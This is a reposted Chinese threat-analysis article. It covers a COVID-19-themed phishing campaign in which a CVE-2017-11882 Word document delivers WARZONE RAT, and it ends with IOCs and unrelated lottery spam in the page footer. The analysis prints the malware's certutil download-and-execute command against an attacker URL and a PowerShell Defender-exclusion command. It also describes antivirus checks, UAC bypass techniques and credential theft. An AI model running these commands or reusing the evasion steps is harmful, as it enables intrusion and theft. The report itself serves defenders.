安基網 首頁 資訊 安全報 查看內容

伏影實驗室再次發現黑客利用新冠疫情實施釣魚郵件攻擊

2020-3-31 12:55| 投稿: xiaotiger |來自: 互聯網


免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

摘要: 概述近日,綠盟科技伏影實驗室再次發現一起黑客利用新冠疫情實施釣魚郵件攻擊的案例,此次案例的攻擊目標為一家位于中國臺灣的POS解決方案提供商。黑客偽造成美國疾病預防與控制中心發送郵件,實則是通過AOL郵箱發送釣魚郵件。早在2011年,AOL郵箱就有被報道發送釣魚郵件的事件。2014年,郵件服務器被 ...

概述

近日,綠盟科技伏影實驗室再次發現一起黑客利用新冠疫情實施釣魚郵件攻擊的案例,此次案例的攻擊目標為一家位于中國臺灣的POS解決方案提供商。

黑客偽造成美國疾病預防與控制中心發送郵件,實則是通過AOL郵箱發送釣魚郵件。早在2011年,AOL郵箱就有被報道發送釣魚郵件的事件。2014年,郵件服務器被黑客攻擊,用來發送釣魚郵件和傳播釣魚網站,后又被勒索軟件使用作為聯系郵箱。

此次釣魚郵件內容和附件名稱也與疫情相關,通過郵件內容誘導用戶打開并查看附件文檔《COVID-19 - nCoV - Special Update.doc》。打開的文檔沒有任何內容顯示,看似無害,但是實際上包含了CVE-2017-11882的漏洞利用。當收件人打開文檔,便會觸發漏洞利用。一旦漏洞成功利用,便會下載并啟動第一階段攻擊載荷,通過多次資源文件解密之后執行最終的商業化遠控木馬WARZONE RAT。

WARZONE RAT是一款功能完善的商業化遠控木馬軟件,有多次進行攻擊活動的記錄。相關信息顯示,WARZONE RAT相關的廣告信息最早于2018年出現在 warzone[.]io,目前仍在warzone[.]pw網站提供銷售服務。Warzone RAT木馬具備比較完整的遠控功能,在后面技術分析部分會進行介紹。WARZONE RAT因為木馬文件中存在字符串AVE_MARIA,又被安全廠商識別為Ave Maria。

2018年12月底,Ave Maria惡意軟件對意大利某能源企業發起網絡釣魚攻擊。黑客以供應商銷售部的名義發出釣魚郵件,附帶了包含CVE-2017-11882漏洞利用的Excel文件,以運行從惡意網站下載的木馬程序。

2019年2月,WARZONE RAT又發生一起疑似針對西班牙語地區的政府機構及能源企業等部門的定向攻擊活動。黑客以應聘者的身份發送誘餌文檔,文檔以簡歷更新的標題為誘餌,對目標人力資源部門進行定向攻擊,誘使相關人員執行惡意代碼,從而控制目標人員機器,從事間諜活動。

2019年11月,研究人員發現思科重定向漏洞被利用,攻擊者使用開放重定向漏洞,使得合法站點允許未經授權的用戶在該站點上創建URL地址,從而使訪問者通過該站點重定向到另外一個站點。黑客將垃圾郵件偽裝成WebEx的會議邀請郵件,將其中鏈接重定向到WARZONE RAT木馬下載鏈接。一旦運行該木馬,受害者的PC將被黑客完全控制。


攻擊流程

本次事件目標郵箱地址在目標企業官網的contact us部分可以找到,黑客可能是通過訪問企業官網確定目標的郵箱地址電話號碼等信息。然后偽造發件人向目標郵箱發送釣魚郵件,誘導收件人查看郵件中帶有漏洞利用的郵件附件文檔,一旦漏洞成功利用,黑客最終將控制目標PC。

當收件人打開郵件附件文檔的時候,會觸發漏洞利用下載第一階段攻擊載荷,然后通過多次解密后獲得并執行第二階段第三階段攻擊載荷,第三階段攻擊載荷便是WARZONE RAT,最終連接C&C服務端等待指令。


技術分析

DOC文檔漏洞利用

郵件附件惡意樣本文檔被命名為《COVID-19 - nCoV - Special Update.doc》,利用漏洞CVE-2017-11882執行shellcode:

shellcode通過WinExec執行命令"CmD /C cErTuTiL -uRlCAchE -sPlIT –f http://getegroup.com/file.exe %TMP%1.exe&start %TMP%1.exe"。

使用CertUtil.exe下載并啟動第一階段攻擊載荷1.exe。CertUtil.exe是Windows的內置程序,用于在Windows中管理證書,使用該程序可以在Windows中安裝,備份,刪除,管理和執行與證書和證書存儲相關的各種功能。另外,CertUtil能夠從遠程URL下載證書或任何其他文件。


第一階段攻擊載荷

第一階段攻擊載荷是一個C#編寫的程序,代碼經過高度混淆。運行過程中通過解密資源文件CK,在內存里面獲得第二階段攻擊載荷DEBFyo.dll,通過Assembly.load 加載第二階段攻擊載荷并調用X()方法。

Re.RA.m('',1,null,510733617)=“X”


第二階段攻擊載荷

第二階段攻擊載荷DEBFyo.dll同樣是一個C#編寫并經過高度混淆的PE文件,文件包含三個資源文件。第二階段攻擊載荷的功能主要是分別解密這三個資源文件生成第三階段攻擊載荷,并按照執行流程進行調用。


第三階段攻擊載荷

第三階段攻擊載荷的三個PE文件:

按照執行流程第一個LOL.dll功能主要是通過查詢WMI數據,檢查系統版本和AV產品,并在啟動目錄下創建指向第一階段攻擊載荷的快捷方式Adobe_Process.exe.lnk

其余兩個文件一個就是最終的木馬程序WARZONE RAT,另外一個26.dll在功能上更像是一個加載模塊,負責加載執行木馬程序。


第二階段攻擊載荷在啟動加載模塊的時候,會將木馬程序的二進制內存數據作為參數傳入。加載模塊在執行過程中,首先會對當前系統環境中的AV產品和操作系統進行檢查。


· Directory.Exists


C:Program FilesAVAST Software

C:Program Files (x86)AVAST Software


· Process.GetProcessesByName


BullGuard, a2guard,drweb,vsserv,AVGUI,bdagent,odscanui,bdredline


· detectwd


SELECT Caption FROM Win32_OperatingSystem


檢查過后,便是比較重要的部分,加載模塊會以掛起狀態啟動第一階段攻擊載荷,生成一個新進程。然后將WARZONE RAT木馬按照內存對齊寫入到這個新進程0x400000開始的地址空間,實現了木馬程序進程映像文件的加載,然后通過SetThreadContext和ResumeThread執行WARZONE RAT木馬。

通過SetThreadContext設置指令地址 :

WARZONE RAT

WARZONE RAT是一款通過C++實現的商業遠控木馬程序,兼容所有的Windows版本,功能非常完善,運行后可以實現對植入機器的完全控制。WARZONE RAT功能主要包括:

· 遠程桌面

· 隱藏的遠程桌面-HRDP

· 特權提升-UAC繞過

· 遠程網絡攝像頭

· 竊取密碼-支持流行的瀏覽器和電子郵件客戶端( Chrome, Firefox, Internet Explorer, Edge, Outlook, Thunderbird, Foxmail)

· 文件管理功能-高速的文件上傳下載,支持文件執行和刪除

· 實時和離線的鍵盤記錄

· 反向代理

· 自動任務

· 批量管理

· 智能更新

· Windows Defender繞過


WARZONE RAT銷售網站上,提供了WARZONE RAT的高級版本WARZONE POISON, 在包含了WARZONE RAT的全功能同時,增加了隱藏進程、隱藏文件、隱藏啟動項、瀏覽器和遠程會話劫持等功能。同時,還提供DOC和EXCEL exploit的定制服務。

WARZONE RAT因為木馬文件中存在字符串AVE_MARIA,又被安全廠商識別為Ave Maria。


木馬功能分析

連接C&C,發送并接收數據:

木馬傳輸的數據使用了RC4加密算法加密,密鑰為“warzone160":

下載并執行文件功能:

設置開啟遠程桌面:

特權提升針對不同版本的操作系統使用不同的方法:

1. 通過添加Windows Defender排除項提升權限

2. 通過sdclt.exe提權,當 sdclt.exe 被標準用戶權限的進程調用,它會以更高權限運行另一個進程 sdclt.exe。高權限的 sdclt.exe 進程會調用 C:WindowsSystem32control.exe,而control.exe 進程會以更高權限運行,并嘗試打開 HKCUSoftwareClassesFoldershellopencommand 注冊表值。

3. 利用 IFileOperation 漏洞利用提權。

首先設置注冊表鍵值為當前程序路徑

加載自身WM_DSP資源模塊,使用pkgmgr.exe進行提權運行注冊表中設置的程序路徑。


竊取密碼

竊取Chrome存儲的用戶信息:

竊取IE存儲的用戶信息:

竊取FireFox用戶信息:

竊取Outlook用戶信息:

竊取ThunderBird用戶信息:

竊取FoxMail信息:

鍵盤記錄

鍵盤記錄鉤子,記錄鍵盤輸入信息:


部分C&C指令表


事件影響及建議

近日發生的攻擊事件表明,黑客不斷利用當前新冠疫情的熱度,進行釣魚郵件攻擊,投放遠控木馬。建議用戶不要被郵件內容誘惑,隨便打開不明來源的郵件附件,另外要更新系統和相關軟件,及時安裝漏洞補丁。另外企業IT部門可以針對不明來源的可疑郵件進行過濾和攔截,保護企業內部安全。


IOCs

URL

http[:]//getegroup.com/file.exe

C&C

phantom101.duckdns.org:5200

45.147.231.168

hash:

b720c71bfd199d956e21d8366fcda5dda66a8b085806329e67955925b16a361c

cd25cea911bae68cf7672539cf6d2748753719bd7494bc9330171d83e4330d03

d340edceb10f4986da886264470c85e7e17dc74a76eb7d100c22b9527e32f1a3

cmd

powershell Add-MpPreference -ExclusionPath C:

CmD /C cErTuTiL -uRlCAchE -sPlIT -f hxxp://getegroup.com/file.exe %TMP%1.exe&start %TMP%1.exe

strings

warzone160

SELECT * FROM logins

reg

HKCUSoftwareMicrosoftWindowsCurrentVersionInternet Settings


· MaxConnectionsPer1_0Serve

· MaxConnectionsPerServer


HKCUSoftware_rptls

·Install

HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpec



小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

本文出自:https://www.toutiao.com/a6809939125106377227/

免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!


鮮花

握手

雷人

路過

雞蛋

相關閱讀

最新評論

 最新
返回頂部
洗衣店赚钱联系澳洁 中国体育彩票排列五怎么玩 赛车开奖结果 深圳风采怎样对奖 安徽快三走势图 彩票平台靠谱 新疆11选5手机版 湖北11选五5走势图 基本 体彩电子投注单下载 pc蛋蛋玩啥游戏最赚钱 江西11选五5是什么彩票